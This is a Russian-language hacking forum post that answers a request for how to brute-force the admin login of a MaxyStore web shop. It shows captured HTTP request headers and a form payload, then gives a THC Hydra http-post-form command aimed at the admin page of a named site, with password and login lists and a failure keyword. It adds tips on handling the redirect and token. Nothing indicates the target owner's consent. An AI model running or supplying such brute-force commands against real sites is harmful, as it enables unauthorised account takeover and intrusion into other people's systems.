Гидра и Http-форма

15.04.2015, 09:14

lifescore

Постоянный

Регистрация: 27.08.2011

Сообщений: 640

С нами: 7742486

Репутация: 72

Цитата:

Сообщение от BUTUZ

↑
Подскажите пожалуйста, какая должна быть команда для брута http-админки MaxyStore?

Код:

HEADERS

Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
User-Agent: runscope/0.1

QUERYSTRING
route: common/login

PARAMETERS
password: demo
username: demo

BODY
username=demo&password=demo

Вообще там Content-Type: multipart/form-data

Payload должен выглядеть как-то так

Код:

------WebKitFormBoundarypeTHmaEyYDJ1cZXG
Content-Disposition: form-data; name="username"

demo
------WebKitFormBoundarypeTHmaEyYDJ1cZXG
Content-Disposition: form-data; name="password"

demo
------WebKitFormBoundarypeTHmaEyYDJ1cZXG--

хз гидры нет под рукой, да и никогда небыло) нупримерно так по FAQ попробуй

Код:

$ hydra -L "logins path" -P "pass.txt path" http://2011.maxystore.ru/admin/index.php http-post-form "route=common/login:username=^USER^&password=^PASS:alert-danger"

p.s. alert-danger - invalid keyword (хз как в гидре, я указал кейворд тега.. ибо plain text там на русском весь, а юникод консоли не любят)

p.s.s. не забывай про редирект после отправки данных формы, и с редиректом выдается токен

p.s.s.s. почему именно гидра ?....